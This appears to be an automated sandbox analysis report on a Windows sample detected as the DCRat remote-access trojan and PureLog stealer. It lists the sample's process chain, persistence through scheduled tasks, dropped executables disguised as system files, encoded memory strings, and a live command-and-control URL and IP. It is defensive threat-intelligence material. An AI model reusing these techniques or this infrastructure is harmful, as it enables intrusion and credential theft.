Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\F3ePjP272h.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: Idle.exe, 0000001A.00000002.2152441908.0000000012AC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: eEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: Idle.exe, 0000001A.00000002.2154748443.000000001B4E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
Source: Idle.exe, 0000001A.00000002.2154748443.000000001B5B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Idle.exe, 0000001A.00000002.2152441908.0000000012C8C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: gEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: w32tm.exe, 00000024.00000002.2197823556.000002A07B809000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\F3ePjP272h.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process token adjusted: Debug
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process token adjusted: Debug
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process token adjusted: Debug
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process token adjusted: Debug
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\F3ePjP272h.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\diPKyqwECs.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Speech\Engines\SR\Idle.exe "C:\Windows\Speech\Engines\SR\Idle.exe"	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\euqVpFfbpH.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Speech\Engines\SR\Idle.exe "C:\Windows\Speech\Engines\SR\Idle.exe"

Source: C:\Users\user\Desktop\F3ePjP272h.exe	Queries volume information: C:\Users\user\Desktop\F3ePjP272h.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Queries volume information: C:\Users\user\Desktop\F3ePjP272h.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Queries volume information: C:\Users\user\Desktop\F3ePjP272h.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Queries volume information: C:\Windows\Speech\Engines\SR\Idle.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Queries volume information: C:\Windows\Speech\Engines\SR\Idle.exe VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Queries volume information: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Queries volume information: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe VolumeInformation
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Queries volume information: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe VolumeInformation
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Queries volume information: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Queries volume information: C:\Windows\Speech\Engines\SR\Idle.exe VolumeInformation
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Queries volume information: C:\Windows\Speech\Engines\SR\Idle.exe VolumeInformation

Source: C:\Users\user\Desktop\F3ePjP272h.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.2051185563.0000000012DEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: F3ePjP272h.exe PID: 3364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: F3ePjP272h.exe PID: 1372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Idle.exe PID: 5632, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: F3ePjP272h.exe, type: SAMPLE
Source: Yara match	File source: 0.0.F3ePjP272h.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2004955727.0000000000702000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Windows\Speech\Engines\SR\Idle.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: F3ePjP272h.exe, type: SAMPLE
Source: Yara match	File source: 0.0.F3ePjP272h.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Windows\Speech\Engines\SR\Idle.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.2051185563.0000000012DEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: F3ePjP272h.exe PID: 3364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: F3ePjP272h.exe PID: 1372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Idle.exe PID: 5632, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: F3ePjP272h.exe, type: SAMPLE
Source: Yara match	File source: 0.0.F3ePjP272h.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2004955727.0000000000702000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Windows\Speech\Engines\SR\Idle.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: F3ePjP272h.exe, type: SAMPLE
Source: Yara match	File source: 0.0.F3ePjP272h.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Windows\Speech\Engines\SR\Idle.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	11 Windows Management Instrumentation	1 Scheduled Task/Job	11 Process Injection	133 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scripting	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	12 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
F3ePjP272h.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
F3ePjP272h.exe	54%	Virustotal		Browse
F3ePjP272h.exe	100%	Avira	HEUR/AGEN.1323342
F3ePjP272h.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Windows\Speech\Engines\SR\Idle.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\diPKyqwECs.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\nHnXqlGz.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\AppData\Local\Temp\euqVpFfbpH.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\xpHnaOLh.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\Desktop\ECoURVov.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\fRPzNptz.log	100%	Avira	TR/AVI.Agent.updqb
C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	100%	Avira	HEUR/AGEN.1323342
C:\Windows\Speech\Engines\SR\Idle.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\AxEwwgFd.log	100%	Joe Sandbox ML
C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\ViwkdMoR.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\xpHnaOLh.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\ECoURVov.log	100%	Joe Sandbox ML
C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files (x86)\Windows Mail\jmfWpjtPWHWFodUifDHiQtgxi.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\MSBuild\Microsoft\jmfWpjtPWHWFodUifDHiQtgxi.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\AxEwwgFd.log	8%	ReversingLabs
C:\Users\user\Desktop\ECoURVov.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\ViwkdMoR.log	8%	ReversingLabs
C:\Users\user\Desktop\fRPzNptz.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\kvKyGzpq.log	25%	ReversingLabs
C:\Users\user\Desktop\nHnXqlGz.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\xpHnaOLh.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\zjWVMLxf.log	25%	ReversingLabs
C:\Windows\Speech\Engines\SR\Idle.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Source	Detection	Scanner	Label
http://328579cm.renyash.ru	100%	Avira URL Cloud	malware
http://328579cm.renyash.ru/VmMulti.php	100%	Avira URL Cloud	malware
http://328579cm.renyash.ru/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
328579cm.renyash.ru	172.67.220.198	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://328579cm.renyash.ru/VmMulti.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	F3ePjP272h.exe, 00000000.00000002.2048080502.000000000303B000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001A.00000002.2145997422.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://328579cm.renyash.ru	Idle.exe, 0000001A.00000002.2145997422.0000000002FB7000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001A.00000002.2145997422.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://328579cm.renyash.ru/	Idle.exe, 0000001A.00000002.2145997422.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.220.198	328579cm.renyash.ru	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580724
Start date and time:	2024-12-25 19:31:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	F3ePjP272h.exe renamed because original name is a hash value
Original Sample Name:	49715a369f3516495cd8016709b367a7.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@45/34@1/1
EGA Information:	Successful, ratio: 9.1%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target F3ePjP272h.exe, PID 1372 because it is empty
Execution Graph export aborted for target F3ePjP272h.exe, PID 4580 because it is empty
Execution Graph export aborted for target Idle.exe, PID 1576 because it is empty
Execution Graph export aborted for target Idle.exe, PID 1816 because it is empty
Execution Graph export aborted for target Idle.exe, PID 5632 because it is empty
Execution Graph export aborted for target Idle.exe, PID 6776 because it is empty
Execution Graph export aborted for target jmfWpjtPWHWFodUifDHiQtgxi.exe, PID 4276 because it is empty
Execution Graph export aborted for target jmfWpjtPWHWFodUifDHiQtgxi.exe, PID 4760 because it is empty
Execution Graph export aborted for target sihost.exe, PID 1264 because it is empty
Execution Graph export aborted for target sihost.exe, PID 3944 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:32:07	API Interceptor	1x Sleep call for process: Idle.exe modified
19:31:58	Task Scheduler	Run new task: F3ePjP272h path: "C:\Users\user\Desktop\F3ePjP272h.exe"
19:31:58	Task Scheduler	Run new task: F3ePjP272hF path: "C:\Users\user\Desktop\F3ePjP272h.exe"
19:31:58	Task Scheduler	Run new task: Idle path: "C:\Windows\Speech\Engines\SR\Idle.exe"
19:31:58	Task Scheduler	Run new task: IdleI path: "C:\Windows\Speech\Engines\SR\Idle.exe"
19:31:58	Task Scheduler	Run new task: jmfWpjtPWHWFodUifDHiQtgxi path: "C:\Program Files (x86)\reference assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe"
19:31:58	Task Scheduler	Run new task: jmfWpjtPWHWFodUifDHiQtgxij path: "C:\Program Files (x86)\reference assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe"
19:31:59	Task Scheduler	Run new task: sihost path: "C:\Users\Default\Cookies\sihost.exe"
19:31:59	Task Scheduler	Run new task: sihosts path: "C:\Users\Default\Cookies\sihost.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.220.198	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer	Browse	749858cm.renyash.ru/javascriptrequestApiBasePrivate.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	00000.ps1	Get hash	malicious	LummaC	Browse	104.21.38.253
	https://fsharetv.co/	Get hash	malicious	Unknown	Browse	172.67.131.140
	123.ps1	Get hash	malicious	LummaC	Browse	104.21.90.105
	https://t.co/aoHJd5qL2s	Get hash	malicious	Unknown	Browse	172.67.174.18
	https://yungbucksbbq.com/portbiz/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://email.equifaxbreachsettlement.com/c/eJwUys9qtDAQAPCnSY6STLL_DjnIp4GFr-3iLrX0EuLMiMLqWo1r-_al9x-5yDrGo2SnD8YednvYK9m5lhEPSJpaYtPgDk-NUUQKCS3r2MjegQKrAbSy1oLKWmC1UycbkU9asxZW8dfat_G7mTlit3BKdx54TBk-Bnl3XUrTIkwuwAvw27Zlw8808xR7Qh4Tz39OgJ-ZmAdhPOODWJiihuP7y__al5_1Vc5uoPhMfRyFVeuCGdMqkyv9R7hUb6HKb3m4VOUlPxfhX14VoThfb-Favhby6eA3AAD__0qSUF8	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://assets.website-files.com/65efffe8d4e10d26910f0543/65f65633ab8b2f021b357c18_64146967722.pdf	Get hash	malicious	Unknown	Browse	104.16.123.96
	https://issuu.com/txbct.com/docs/navex_quote_65169.?fr=xKAE9_zU1NQ	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	PodcastsTries.exe	Get hash	malicious	Vidar	Browse	172.64.41.3

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\AxEwwgFd.log	cbCjTbodwa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	vb8DOBZQ4X.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	6G8OR42xrB.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	gkcQYEdJSO.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer	Browse
	150bIjWiGH.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	wmdqEYgW2i.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	0wdppTE7Op.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	JNKHlxGvw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	4si9noTBNw.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Program Files (x86)\Reference Assemblies\897f7819a04651

Download File

Process:	C:\Users\user\Desktop\F3ePjP272h.exe
File Type:	ASCII text, with very long lines (391), with no line terminators
Category:	dropped
Size (bytes):	391
Entropy (8bit):	5.842033500088405
Encrypted:	false
SSDEEP:	6:P7TdXybnlAodbyl+R9JH/T9uFrLVjqEb0fKcMBAftqcolmsgZQFzP30vTe:PHdXOdI+hbCwKcqyqNSgELe
MD5:	5B615D775B43A620F92A1E224212DCEF
SHA1:	4CFF0252F57D1BD3326AF4A5950E853EF497EC19
SHA-256:	D49036C82854E954F03B1027BEA3ED3BEE4911227CB8DFDA5B5D754D2CA72277
SHA-512:	6D78ABADCBE614E63C0F9C0E01225413CAE530D405C6AA531BA6725F7BD0EBA0660EBB20CC4C720261C426146A8086861AD63CED256B47D8B36D4900902216D8
Malicious:	false
